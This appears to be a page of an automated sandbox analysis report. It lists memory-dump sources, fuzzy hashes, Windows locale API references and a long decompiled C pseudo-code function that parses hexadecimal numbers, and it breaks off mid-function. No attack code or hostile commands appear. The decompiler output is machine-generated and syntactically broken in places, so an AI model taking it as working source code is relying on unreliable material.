                                                                                                0x00f9ff4f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f9ff4f
                                                                                                0x00fa0003
                                                                                                0x00fa0010
                                                                                                0x00fa0013
                                                                                                0x00fa0016
                                                                                                0x00fa001a
                                                                                                0x00fa001b
                                                                                                0x00fa001e
                                                                                                0x00fa0021
                                                                                                0x00fa0027
                                                                                                0x00fa0028
                                                                                                0x00fa002b
                                                                                                0x00fa002e
                                                                                                0x00fa0031
                                                                                                0x00fa0031
                                                                                                0x00f9fe24
                                                                                                0x00fa003c
                                                                                                0x00fa003f
                                                                                                0x00fa0040
                                                                                                0x00fa0042
                                                                                                0x00fa0044
                                                                                                0x00fa0049
                                                                                                0x00fa0050
                                                                                                0x00fa0050
                                                                                                0x00fa0056
                                                                                                0x00fa0059
                                                                                                0x00fa005a
                                                                                                0x00fa005a
                                                                                                0x00fa0050
                                                                                                0x00fa005e
                                                                                                0x00fa0060
                                                                                                0x00fa0062
                                                                                                0x00fa0064
                                                                                                0x00fa0064
                                                                                                0x00fa0068
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa006a
                                                                                                0x00fa006a
                                                                                                0x00fa006d
                                                                                                0x00fa006f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa006f
                                                                                                0x00fa0064
                                                                                                0x00fa0071
                                                                                                0x00fa007c
                                                                                                0x00fa007c
                                                                                                0x00f9fd90
                                                                                                0x00f9fc2c
                                                                                                0x00f9fc2c
                                                                                                0x00f9fc2c
                                                                                                0x00f9fc2f
                                                                                                0x00f9fc35
                                                                                                0x00f9fc66
                                                                                                0x00f9fc68
                                                                                                0x00f9fcaa
                                                                                                0x00f9fcac
                                                                                                0x00f9fcb3
                                                                                                0x00f9fcba
                                                                                                0x00f9fcbd
                                                                                                0x00f9fcc0
                                                                                                0x00f9fcc2
                                                                                                0x00f9fcc2
                                                                                                0x00f9fcc3
                                                                                                0x00f9fcc6
                                                                                                0x00f9fcd0
                                                                                                0x00f9fcda
                                                                                                0x00f9fcdf
                                                                                                0x00f9fce2
                                                                                                0x00f9fce4
                                                                                                0x00f9fce7
                                                                                                0x00f9fcf0
                                                                                                0x00f9fcf3
                                                                                                0x00f9fcf6
                                                                                                0x00f9fcf9
                                                                                                0x00f9fcff
                                                                                                0x00f9fd02
                                                                                                0x00f9fd05
                                                                                                0x00f9fd05
                                                                                                0x00f9fd05
                                                                                                0x00f9fd0a
                                                                                                0x00f9fd0a
                                                                                                0x00f9fd15
                                                                                                0x00f9fd20
                                                                                                0x00f9fd23
                                                                                                0x00f9fd2f
                                                                                                0x00f9fd34
                                                                                                0x00f9fd3f
                                                                                                0x00f9fd41
                                                                                                0x00f9fd43
                                                                                                0x00f9fd49
                                                                                                0x00f9fd4e
                                                                                                0x00f9fd50
                                                                                                0x00f9fd56
                                                                                                0x00f9fc6a
                                                                                                0x00f9fc75
                                                                                                0x00f9fc78
                                                                                                0x00f9fc84
                                                                                                0x00f9fc86
                                                                                                0x00f9fc8d
                                                                                                0x00f9fc8f
                                                                                                0x00f9fc97
                                                                                                0x00f9fc99
                                                                                                0x00f9fc9b
                                                                                                0x00f9fca0
                                                                                                0x00f9fca3
                                                                                                0x00f9fca9
                                                                                                0x00f9fca9
                                                                                                0x00f9fc37
                                                                                                0x00f9fc45
                                                                                                0x00f9fc51
                                                                                                0x00f9fc53
                                                                                                0x00f9fc65
                                                                                                0x00f9fc65
                                                                                                0x00f9fc35
                                                                                                0x00f9fc26
                                                                                                0x00f9fc15

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 71530d3482411155d2a082b8960b3af47e3c13842446cc23bc06bf3f95976fce
                                                                                                • Instruction ID: b600a3251fb1c0c3926e55d5fbca4d865e1696db7f0d86c4ec962ea25d05abfa
                                                                                                • Opcode Fuzzy Hash: 71530d3482411155d2a082b8960b3af47e3c13842446cc23bc06bf3f95976fce
                                                                                                • Instruction Fuzzy Hash: 47024E71E002199FDF14CFA9D8806ADB7B1FF89324F25826AE819E7345D731AE05DB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetLocaleInfoEx.KERNEL32(?,?,00F94A95,?,00000022,00000000,00000002,00000001,?,?,00F92A22,00000000,00000000,00000004,00F91797,00000000), ref: 00F94DD5
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,0000003F,?,00F7960F,?,?,00F94A95,?,00000022,00000000,00000002,00000001,?,?,00F92A22,00000000), ref: 00F94DE0
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID:
                                                                                                • API String ID: 2299586839-0
                                                                                                • Opcode ID: fae0a17ac6362b6317c68f7db1b3bbc6d53978c3d76a1e7b9f9985f8581b2b42
                                                                                                • Instruction ID: 2b6950987b135b884f640f9d1211082b9363014ed9070a6281b126646d97e38a
                                                                                                • Opcode Fuzzy Hash: fae0a17ac6362b6317c68f7db1b3bbc6d53978c3d76a1e7b9f9985f8581b2b42
                                                                                                • Instruction Fuzzy Hash: 11E0EC3A50112CEB9F166F95FC08DAE7F2DFF45761B044156F90956220DE32A822FF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 80%
                                                                                                			E00F7E4B0(void* __ebx, void* __edx, void* __edi, void* __eflags, void* __fp0, void* _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, void** _a24) {
                                                                                                				void* _v3;
                                                                                                				void* _v8;
                                                                                                				char _v16;
                                                                                                				signed int _v20;
                                                                                                				char _v24;
                                                                                                				intOrPtr _v26;
                                                                                                				intOrPtr _v28;
                                                                                                				intOrPtr _v30;
                                                                                                				intOrPtr _v32;
                                                                                                				intOrPtr _v34;
                                                                                                				intOrPtr _v36;
                                                                                                				char _v80;
                                                                                                				void* _v84;
                                                                                                				void* _v88;
                                                                                                				void* _v104;
                                                                                                				void* _v108;
                                                                                                				void* _v112;
                                                                                                				void* _v128;
                                                                                                				void* _v129;
                                                                                                				intOrPtr _v136;
                                                                                                				void* _v140;
                                                                                                				char _v141;
                                                                                                				void* _v148;
                                                                                                				void* _v152;
                                                                                                				intOrPtr* _v156;
                                                                                                				void* _v160;
                                                                                                				void* _v164;
                                                                                                				char* _v168;
                                                                                                				void* _v172;
                                                                                                				intOrPtr* _v176;
                                                                                                				intOrPtr* _v180;
                                                                                                				char _v184;
                                                                                                				void* _v188;
                                                                                                				void** _v192;
                                                                                                				char _v220;
                                                                                                				signed int _v228;
                                                                                                				void* __esi;
                                                                                                				signed int _t450;
                                                                                                				signed int _t451;
                                                                                                				void* _t469;
                                                                                                				void* _t470;
                                                                                                				intOrPtr* _t474;
                                                                                                				intOrPtr _t475;
                                                                                                				void* _t476;
                                                                                                				void* _t477;
                                                                                                				void* _t478;
                                                                                                				void* _t479;
                                                                                                				void* _t481;
                                                                                                				signed short _t497;
                                                                                                				signed int _t498;
                                                                                                				unsigned int _t501;
                                                                                                				void* _t502;
                                                                                                				long _t503;
                                                                                                				char _t506;
                                                                                                				void* _t510;
                                                                                                				void* _t512;
                                                                                                				char _t514;
                                                                                                				void* _t515;
                                                                                                				void* _t516;
                                                                                                				char _t517;
                                                                                                				void* _t518;
                                                                                                				void* _t519;
                                                                                                				void* _t520;
                                                                                                				intOrPtr* _t521;
                                                                                                				signed int _t523;
                                                                                                				char _t524;
                                                                                                				void* _t525;
                                                                                                				signed short _t529;
                                                                                                				signed int _t530;
                                                                                                				signed int _t535;
                                                                                                				void* _t536;
                                                                                                				char _t541;
                                                                                                				void* _t542;
                                                                                                				signed short _t546;
                                                                                                				signed int _t547;
                                                                                                				signed int _t552;
                                                                                                				void* _t553;
                                                                                                				signed int _t556;
                                                                                                				signed int _t560;
                                                                                                				void* _t561;
                                                                                                				signed short _t564;
                                                                                                				signed short _t568;
                                                                                                				signed int _t574;
                                                                                                				void* _t576;
                                                                                                				signed short _t582;
                                                                                                				signed int _t583;
                                                                                                				signed int _t588;
                                                                                                				void* _t589;
                                                                                                				signed int _t592;
                                                                                                				signed short _t593;
                                                                                                				signed short _t597;
                                                                                                				signed short _t602;
                                                                                                				signed int _t603;
                                                                                                				intOrPtr* _t605;
                                                                                                				signed int _t607;
                                                                                                				char _t608;
                                                                                                				void* _t609;
                                                                                                				signed short _t613;
                                                                                                				signed int _t614;
                                                                                                				signed int _t619;
                                                                                                				void* _t620;
                                                                                                				void* _t624;
                                                                                                				void* _t625;
                                                                                                				void* _t626;
                                                                                                				char _t628;
                                                                                                				void* _t629;
                                                                                                				signed short _t633;
                                                                                                				signed int _t634;
                                                                                                				signed int _t639;
                                                                                                				void* _t640;
                                                                                                				void* _t644;
                                                                                                				intOrPtr* _t645;
                                                                                                				signed int _t651;
                                                                                                				void* _t652;
                                                                                                				signed short _t658;
                                                                                                				signed int _t659;
                                                                                                				intOrPtr* _t661;
                                                                                                				void* _t663;
                                                                                                				char _t665;
                                                                                                				void* _t666;
                                                                                                				signed short _t670;
                                                                                                				signed int _t671;
                                                                                                				signed int _t676;
                                                                                                				void* _t677;
                                                                                                				void* _t684;
                                                                                                				char* _t685;
                                                                                                				intOrPtr* _t694;
                                                                                                				void* _t696;
                                                                                                				void* _t698;
                                                                                                				char _t703;
                                                                                                				void* _t704;
                                                                                                				signed short _t708;
                                                                                                				signed int _t709;
                                                                                                				signed int _t714;
                                                                                                				intOrPtr _t715;
                                                                                                				signed short _t721;
                                                                                                				signed int _t722;
                                                                                                				char _t730;
                                                                                                				void* _t731;
                                                                                                				signed int _t732;
                                                                                                				signed int _t737;
                                                                                                				intOrPtr _t739;
                                                                                                				signed short _t742;
                                                                                                				signed short _t746;
                                                                                                				signed short _t751;
                                                                                                				signed int _t752;
                                                                                                				signed int _t757;
                                                                                                				intOrPtr _t758;
                                                                                                				signed short _t764;
                                                                                                				signed int _t765;
                                                                                                				void* _t767;
                                                                                                				signed int _t771;
                                                                                                				void* _t772;
                                                                                                				signed int _t775;
                                                                                                				signed short _t776;
                                                                                                				signed short _t780;
                                                                                                				signed int _t786;
                                                                                                				intOrPtr _t788;
                                                                                                				signed short _t794;
                                                                                                				signed int _t795;
                                                                                                				intOrPtr* _t800;
                                                                                                				intOrPtr _t804;
                                                                                                				intOrPtr* _t805;
                                                                                                				char* _t806;
                                                                                                				void* _t807;
                                                                                                				void* _t808;
                                                                                                				signed int _t810;
                                                                                                				void* _t815;
                                                                                                				void* _t816;
                                                                                                				void* _t817;
                                                                                                				intOrPtr* _t818;
                                                                                                				intOrPtr* _t819;
                                                                                                				intOrPtr* _t822;
                                                                                                				void* _t830;
                                                                                                				void* _t832;
                                                                                                				void* _t838;
                                                                                                				signed int _t839;
                                                                                                				void* _t841;
                                                                                                				void* _t842;
                                                                                                				void** _t845;
                                                                                                				void* _t846;
                                                                                                				void* _t847;
                                                                                                				void** _t850;
                                                                                                				void* _t851;
                                                                                                				void* _t852;
                                                                                                				void** _t854;
                                                                                                				void* _t855;
                                                                                                				void* _t857;
                                                                                                				void** _t859;
                                                                                                				void* _t860;
                                                                                                				void** _t863;
                                                                                                				signed int _t864;
                                                                                                				void* _t865;
                                                                                                				void* _t867;
                                                                                                				signed int _t869;
                                                                                                				void* _t871;
                                                                                                				void* _t872;
                                                                                                				void** _t875;
                                                                                                				void* _t876;
                                                                                                				void* _t877;
                                                                                                				void** _t880;
                                                                                                				void* _t882;
                                                                                                				void** _t884;
                                                                                                				void* _t885;
                                                                                                				signed int _t887;
                                                                                                				void* _t889;
                                                                                                				void* _t890;
                                                                                                				void** _t893;
                                                                                                				void* _t895;
                                                                                                				char _t896;
                                                                                                				signed int _t897;
                                                                                                				intOrPtr* _t900;
                                                                                                				intOrPtr* _t901;
                                                                                                				signed short** _t904;
                                                                                                				void* _t905;
                                                                                                				void* _t907;
                                                                                                				void* _t908;
                                                                                                				intOrPtr* _t909;
                                                                                                				char _t910;
                                                                                                				intOrPtr* _t911;
                                                                                                				signed short** _t913;
                                                                                                				intOrPtr* _t914;
                                                                                                				intOrPtr* _t916;
                                                                                                				signed short** _t919;
                                                                                                				intOrPtr* _t920;
                                                                                                				signed int _t922;
                                                                                                				void* _t923;
                                                                                                				signed short** _t925;
                                                                                                				void* _t926;
                                                                                                				intOrPtr* _t928;
                                                                                                				signed short** _t930;
                                                                                                				intOrPtr* _t931;
                                                                                                				void* _t941;
                                                                                                				void* _t942;
                                                                                                				void* _t943;
                                                                                                				signed short* _t945;
                                                                                                				intOrPtr* _t946;
                                                                                                				void* _t947;
                                                                                                				char* _t948;
                                                                                                				signed short* _t951;
                                                                                                				intOrPtr* _t952;
                                                                                                				signed short* _t953;
                                                                                                				signed int _t954;
                                                                                                				signed short* _t955;
                                                                                                				signed short* _t956;
                                                                                                				intOrPtr* _t957;
                                                                                                				signed short* _t958;
                                                                                                				signed short* _t959;
                                                                                                				signed int _t960;
                                                                                                				void** _t961;
                                                                                                				signed short* _t962;
                                                                                                				void* _t963;
                                                                                                				intOrPtr* _t964;
                                                                                                				signed short* _t965;
                                                                                                				signed short* _t966;
                                                                                                				signed int _t974;
                                                                                                				void* _t976;
                                                                                                				void* _t978;
                                                                                                				short* _t983;
                                                                                                				char* _t984;
                                                                                                				void* _t985;
                                                                                                				void** _t987;
                                                                                                				long _t988;
                                                                                                				intOrPtr _t994;
                                                                                                				char* _t996;
                                                                                                				void* _t997;
                                                                                                				void* _t998;
                                                                                                				signed int _t999;
                                                                                                				void* _t1001;
                                                                                                				signed int _t1005;
                                                                                                				void* _t1007;
                                                                                                				void* _t1008;
                                                                                                				void* _t1009;
                                                                                                				void* _t1010;
                                                                                                				void* _t1011;
                                                                                                				void* _t1012;
                                                                                                				void* _t1013;
                                                                                                				void* _t1017;
                                                                                                				void* _t1018;
                                                                                                
                                                                                                				_t999 = _t1005;
                                                                                                				_t450 =  *0xfcf00c; // 0xfd8fa683
                                                                                                				_t451 = _t450 ^ _t999;
                                                                                                				_v20 = _t451;
                                                                                                				 *[fs:0x0] =  &_v16;
                                                                                                				_t971 = _a12;
                                                                                                				_v136 = _a16;
                                                                                                				_v188 = _a8;
                                                                                                				_v192 = _a24;
                                                                                                				_v160 = 0;
                                                                                                				_v8 = 0;
                                                                                                				_t804 = _a20;
                                                                                                				_t818 =  *((intOrPtr*)( *((intOrPtr*)(_t804 + 0x30)) + 4));
                                                                                                				_v180 = _t818;
                                                                                                				 *((intOrPtr*)( *_t818 + 4))(_t451, __edi, _t978, __ebx,  *[fs:0x0], 0xfb6d44, 0xffffffff, _t998);
                                                                                                				_v160 = 1;
                                                                                                				_v176 = E00F7B720(__edx, _t971, _t978, __fp0,  &_v184);
                                                                                                				_v160 = 1;
                                                                                                				_t1007 = _t1005 - 0xb4 + 4;
                                                                                                				_v160 = 1;
                                                                                                				_v8 = 0xffffffff;
                                                                                                				_t819 = _v180;
                                                                                                				if(_t819 != 0) {
                                                                                                					_t800 =  *((intOrPtr*)( *_t819 + 8))();
                                                                                                					if(_t800 != 0) {
                                                                                                						 *((intOrPtr*)( *((intOrPtr*)( *_t800))))(1);
                                                                                                					}
                                                                                                				}
                                                                                                				E00F7B310( &_v128);
                                                                                                				_v8 = 2;
                                                                                                				_t805 =  *((intOrPtr*)( *((intOrPtr*)(_t804 + 0x30)) + 4));
                                                                                                				_v180 = _t805;
                                                                                                				 *((intOrPtr*)( *_t805 + 4))();
                                                                                                				_push( &_v184);
                                                                                                				_v160 = 4;
                                                                                                				_t822 = E00F783C0();
                                                                                                				_t1008 = _t1007 + 4;
                                                                                                				_v156 = _t822;
                                                                                                				_v160 = 0;
                                                                                                				_v8 = 1;
                                                                                                				if(_t805 != 0) {
                                                                                                					_t822 = _v156;
                                                                                                				}
                                                                                                				 *((intOrPtr*)( *_t822 + 0x2c))("0123456789ABCDEFabcdef-+XxPp", 0xfc7735,  &_v80);
                                                                                                				_t806 = _v188;
                                                                                                				_t983 = _t806;
                                                                                                				_v141 = 0;
                                                                                                				_t469 = E00F7F9A0(_t971, _v136);
                                                                                                				_t1009 = _t1008 + 8;
                                                                                                				if(_t469 == 0) {
                                                                                                					_t767 =  *((intOrPtr*)(_t971 + 4));
                                                                                                					if(_t767 == 0) {
                                                                                                						_t931 =  *_t971;
                                                                                                						if(_t931 == 0) {
                                                                                                							L16:
                                                                                                							 *_t971 = 0;
                                                                                                						} else {
                                                                                                							_t966 =  *( *(_t931 + 0x1c));
                                                                                                							if(_t966 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t931 + 0x2c)))) <= 0) {
                                                                                                								_t794 =  *((intOrPtr*)( *_t931 + 0x18))() & 0x0000ffff;
                                                                                                							} else {
                                                                                                								_t794 =  *_t966 & 0x0000ffff;
                                                                                                							}
                                                                                                							_t795 = _t794 & 0x0000ffff;
                                                                                                							if(0xffff == _t795) {
                                                                                                								goto L16;
                                                                                                							} else {
                                                                                                								 *(_t971 + 6) = _t795;
                                                                                                							}
                                                                                                						}
                                                                                                						 *((char*)(_t971 + 4)) = 1;
                                                                                                						_t767 = 1;
                                                                                                					}
                                                                                                					_t960 =  *(_t971 + 6) & 0x0000ffff;
                                                                                                					if(_t960 != _v34) {
                                                                                                						_t922 = _t960;
                                                                                                						__eflags = _t767;
                                                                                                						if(_t767 == 0) {
                                                                                                							_t926 =  *_t971;
                                                                                                							_t775 = _t960;
                                                                                                							__eflags = _t926;
                                                                                                							if(_t926 == 0) {
                                                                                                								L36:
                                                                                                								 *_t971 = 0;
                                                                                                								_t776 = _t775 & 0x0000ffff;
                                                                                                							} else {
                                                                                                								_t963 =  *( *(_t926 + 0x1c));
                                                                                                								__eflags = _t963;
                                                                                                								if(_t963 == 0) {
                                                                                                									L32:
                                                                                                									_t780 =  *((intOrPtr*)( *_t926 + 0x18))() & 0x0000ffff;
                                                                                                								} else {
                                                                                                									__eflags =  *( *(_t926 + 0x2c));
                                                                                                									if( *( *(_t926 + 0x2c)) <= 0) {
                                                                                                										goto L32;
                                                                                                									} else {
                                                                                                										_t780 =  *_t963 & 0x0000ffff;
                                                                                                									}
                                                                                                								}
                                                                                                								_t776 = _t780 & 0x0000ffff;
                                                                                                								__eflags = 0xffff - _t776;
                                                                                                								if(0xffff == _t776) {
                                                                                                									_t775 =  *(_t971 + 6) & 0x0000ffff;
                                                                                                									goto L36;
                                                                                                								} else {
                                                                                                									 *(_t971 + 6) = _t776;
                                                                                                								}
                                                                                                							}
                                                                                                							 *((char*)(_t971 + 4)) = 1;
                                                                                                							_t922 = _t776 & 0x0000ffff;
                                                                                                						}
                                                                                                						__eflags = _t922 - _v36;
                                                                                                						if(_t922 == _v36) {
                                                                                                							 *_t806 = 0x2d;
                                                                                                							_t983 = _t806 + 1;
                                                                                                							_t923 =  *_t971;
                                                                                                							__eflags = _t923;
                                                                                                							if(_t923 == 0) {
                                                                                                								L46:
                                                                                                								 *_t971 = 0;
                                                                                                								 *((char*)(_t971 + 4)) = 1;
                                                                                                							} else {
                                                                                                								__eflags =  *( *(_t923 + 0x1c));
                                                                                                								if( *( *(_t923 + 0x1c)) == 0) {
                                                                                                									L43:
                                                                                                									_t771 =  *((intOrPtr*)( *_t923 + 0x1c))() & 0x0000ffff;
                                                                                                								} else {
                                                                                                									_t961 =  *(_t923 + 0x2c);
                                                                                                									_t772 =  *_t961;
                                                                                                									__eflags = _t772;
                                                                                                									if(_t772 <= 0) {
                                                                                                										goto L43;
                                                                                                									} else {
                                                                                                										 *_t961 = _t772 - 1;
                                                                                                										_t925 =  *(_t923 + 0x1c);
                                                                                                										_t962 =  *_t925;
                                                                                                										 *_t925 =  &(_t962[1]);
                                                                                                										_t771 =  *_t962 & 0x0000ffff;
                                                                                                									}
                                                                                                								}
                                                                                                								__eflags = 0xffff - _t771;
                                                                                                								if(0xffff == _t771) {
                                                                                                									goto L46;
                                                                                                								} else {
                                                                                                									 *((char*)(_t971 + 4)) = 0;
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                					} else {
                                                                                                						 *_t806 = 0x2b;
                                                                                                						_t983 = _t806 + 1;
                                                                                                						_t928 =  *_t971;
                                                                                                						if(_t928 == 0) {
                                                                                                							L26:
                                                                                                							 *_t971 = 0;
                                                                                                							 *((char*)(_t971 + 4)) = 1;
                                                                                                						} else {
                                                                                                							if( *( *(_t928 + 0x1c)) == 0) {
                                                                                                								L23:
                                                                                                								_t786 =  *((intOrPtr*)( *_t928 + 0x1c))() & 0x0000ffff;
                                                                                                							} else {
                                                                                                								_t964 =  *((intOrPtr*)(_t928 + 0x2c));
                                                                                                								_t788 =  *_t964;
                                                                                                								if(_t788 <= 0) {
                                                                                                									goto L23;
                                                                                                								} else {
                                                                                                									 *_t964 = _t788 - 1;
                                                                                                									_t930 =  *(_t928 + 0x1c);
                                                                                                									_t965 =  *_t930;
                                                                                                									 *_t930 =  &(_t965[1]);
                                                                                                									_t786 =  *_t965 & 0x0000ffff;
                                                                                                								}
                                                                                                							}
                                                                                                							if(0xffff == _t786) {
                                                                                                								goto L26;
                                                                                                							} else {
                                                                                                								 *((char*)(_t971 + 4)) = 0;
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				 *_t983 = 0x7830;
                                                                                                				_t807 = 0;
                                                                                                				_t984 = _t983 + 2;
                                                                                                				_v129 = 0;
                                                                                                				_v140 = _t984;
                                                                                                				_v164 = 0;
                                                                                                				_v148 = 0;
                                                                                                				_t470 = E00F7F9A0(_t971, _v136);
                                                                                                				_t1010 = _t1009 + 8;
                                                                                                				if(_t470 == 0) {
                                                                                                					if( *((intOrPtr*)(_t971 + 4)) == 0) {
                                                                                                						_t920 =  *_t971;
                                                                                                						if(_t920 == 0) {
                                                                                                							L56:
                                                                                                							 *_t971 = _t807;
                                                                                                						} else {
                                                                                                							_t959 =  *( *(_t920 + 0x1c));
                                                                                                							if(_t959 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t920 + 0x2c)))) <= 0) {
                                                                                                								_t764 =  *((intOrPtr*)( *_t920 + 0x18))() & 0x0000ffff;
                                                                                                							} else {
                                                                                                								_t764 =  *_t959 & 0x0000ffff;
                                                                                                							}
                                                                                                							_t765 = _t764 & 0x0000ffff;
                                                                                                							if(0xffff == _t765) {
                                                                                                								goto L56;
                                                                                                							} else {
                                                                                                								 *(_t971 + 6) = _t765;
                                                                                                							}
                                                                                                						}
                                                                                                						 *((char*)(_t971 + 4)) = 1;
                                                                                                					}
                                                                                                					if(( *(_t971 + 6) & 0x0000ffff) == _v80) {
                                                                                                						_t909 =  *_t971;
                                                                                                						if(_t909 == 0) {
                                                                                                							L66:
                                                                                                							 *_t971 = _t807;
                                                                                                							_t730 = 1;
                                                                                                						} else {
                                                                                                							if( *( *(_t909 + 0x1c)) == _t807) {
                                                                                                								L63:
                                                                                                								_t757 =  *((intOrPtr*)( *_t909 + 0x1c))() & 0x0000ffff;
                                                                                                							} else {
                                                                                                								_t957 =  *((intOrPtr*)(_t909 + 0x2c));
                                                                                                								_t758 =  *_t957;
                                                                                                								if(_t758 <= 0) {
                                                                                                									goto L63;
                                                                                                								} else {
                                                                                                									 *_t957 = _t758 - 1;
                                                                                                									_t919 =  *(_t909 + 0x1c);
                                                                                                									_t958 =  *_t919;
                                                                                                									 *_t919 =  &(_t958[1]);
                                                                                                									_t757 =  *_t958 & 0x0000ffff;
                                                                                                								}
                                                                                                							}
                                                                                                							if(0xffff == _t757) {
                                                                                                								goto L66;
                                                                                                							} else {
                                                                                                								_t730 = 0;
                                                                                                							}
                                                                                                						}
                                                                                                						 *((char*)(_t971 + 4)) = _t730;
                                                                                                						_t731 = E00F7F9A0(_t971, _v136);
                                                                                                						_t1010 = _t1010 + 8;
                                                                                                						if(_t731 != 0) {
                                                                                                							L99:
                                                                                                							_v129 = 1;
                                                                                                						} else {
                                                                                                							_t910 =  *((intOrPtr*)(_t971 + 4));
                                                                                                							if(_t910 == 0) {
                                                                                                								_t916 =  *_t971;
                                                                                                								if(_t916 == 0) {
                                                                                                									L76:
                                                                                                									 *_t971 = _t807;
                                                                                                								} else {
                                                                                                									_t956 =  *( *(_t916 + 0x1c));
                                                                                                									if(_t956 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t916 + 0x2c)))) <= _t807) {
                                                                                                										_t751 =  *((intOrPtr*)( *_t916 + 0x18))() & 0x0000ffff;
                                                                                                									} else {
                                                                                                										_t751 =  *_t956 & 0x0000ffff;
                                                                                                									}
                                                                                                									_t752 = _t751 & 0x0000ffff;
                                                                                                									if(0xffff == _t752) {
                                                                                                										goto L76;
                                                                                                									} else {
                                                                                                										 *(_t971 + 6) = _t752;
                                                                                                									}
                                                                                                								}
                                                                                                								 *((char*)(_t971 + 4)) = 1;
                                                                                                								_t910 = 1;
                                                                                                							}
                                                                                                							_t732 =  *(_t971 + 6) & 0x0000ffff;
                                                                                                							if(_t732 == _v30) {
                                                                                                								L91:
                                                                                                								_t911 =  *_t971;
                                                                                                								if(_t911 == 0) {
                                                                                                									L98:
                                                                                                									 *_t971 = _t807;
                                                                                                									 *((char*)(_t971 + 4)) = 1;
                                                                                                								} else {
                                                                                                									if( *( *(_t911 + 0x1c)) == _t807) {
                                                                                                										L95:
                                                                                                										_t737 =  *((intOrPtr*)( *_t911 + 0x1c))() & 0x0000ffff;
                                                                                                									} else {
                                                                                                										_t952 =  *((intOrPtr*)(_t911 + 0x2c));
                                                                                                										_t739 =  *_t952;
                                                                                                										if(_t739 <= 0) {
                                                                                                											goto L95;
                                                                                                										} else {
                                                                                                											 *_t952 = _t739 - 1;
                                                                                                											_t913 =  *(_t911 + 0x1c);
                                                                                                											_t953 =  *_t913;
                                                                                                											 *_t913 =  &(_t953[1]);
                                                                                                											_t737 =  *_t953 & 0x0000ffff;
                                                                                                										}
                                                                                                									}
                                                                                                									if(0xffff == _t737) {
                                                                                                										goto L98;
                                                                                                									} else {
                                                                                                										 *((char*)(_t971 + 4)) = 0;
                                                                                                									}
                                                                                                								}
                                                                                                							} else {
                                                                                                								_t954 = _t732;
                                                                                                								if(_t910 == 0) {
                                                                                                									_t914 =  *_t971;
                                                                                                									if(_t914 == 0) {
                                                                                                										L88:
                                                                                                										 *_t971 = _t807;
                                                                                                										_t742 = _t732 & 0x0000ffff;
                                                                                                									} else {
                                                                                                										_t955 =  *( *(_t914 + 0x1c));
                                                                                                										if(_t955 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t914 + 0x2c)))) <= _t807) {
                                                                                                											_t746 =  *((intOrPtr*)( *_t914 + 0x18))() & 0x0000ffff;
                                                                                                										} else {
                                                                                                											_t746 =  *_t955 & 0x0000ffff;
                                                                                                										}
                                                                                                										_t742 = _t746 & 0x0000ffff;
                                                                                                										if(0xffff == _t742) {
                                                                                                											_t732 =  *(_t971 + 6) & 0x0000ffff;
                                                                                                											goto L88;
                                                                                                										} else {
                                                                                                											 *(_t971 + 6) = _t742;
                                                                                                										}
                                                                                                									}
                                                                                                									 *((char*)(_t971 + 4)) = 1;
                                                                                                									_t954 = _t742 & 0x0000ffff;
                                                                                                								}
                                                                                                								if(_t954 != _v32) {
                                                                                                									goto L99;
                                                                                                								} else {
                                                                                                									goto L91;
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				_t940 = 0x300;
                                                                                                				_t472 =  ==  ? 0x300 : 0x24;
                                                                                                				_v180 = LocalFree;
                                                                                                				_v156 =  ==  ? 0x300 : 0x24;
                                                                                                				_t474 =  >=  ? _v128 :  &_v128;
                                                                                                				_v168 = _t474;
                                                                                                				_t475 =  *_t474;
                                                                                                				if(_t475 == 0x7f || _t475 <= 0) {
                                                                                                					_t476 = E00F7F9A0(_t971, _v136);
                                                                                                					_t1011 = _t1010 + 8;
                                                                                                					__eflags = _t476;
                                                                                                					if(_t476 != 0) {
                                                                                                						goto L171;
                                                                                                					} else {
                                                                                                						do {
                                                                                                							__eflags =  *((char*)(_t971 + 4));
                                                                                                							if( *((char*)(_t971 + 4)) == 0) {
                                                                                                								_t890 =  *_t971;
                                                                                                								__eflags = _t890;
                                                                                                								if(_t890 == 0) {
                                                                                                									L189:
                                                                                                									 *_t971 = 0;
                                                                                                								} else {
                                                                                                									_t940 =  *( *(_t890 + 0x1c));
                                                                                                									__eflags = _t940;
                                                                                                									if(_t940 == 0) {
                                                                                                										L186:
                                                                                                										_t670 =  *((intOrPtr*)( *_t890 + 0x18))() & 0x0000ffff;
                                                                                                									} else {
                                                                                                										__eflags =  *( *(_t890 + 0x2c));
                                                                                                										if( *( *(_t890 + 0x2c)) <= 0) {
                                                                                                											goto L186;
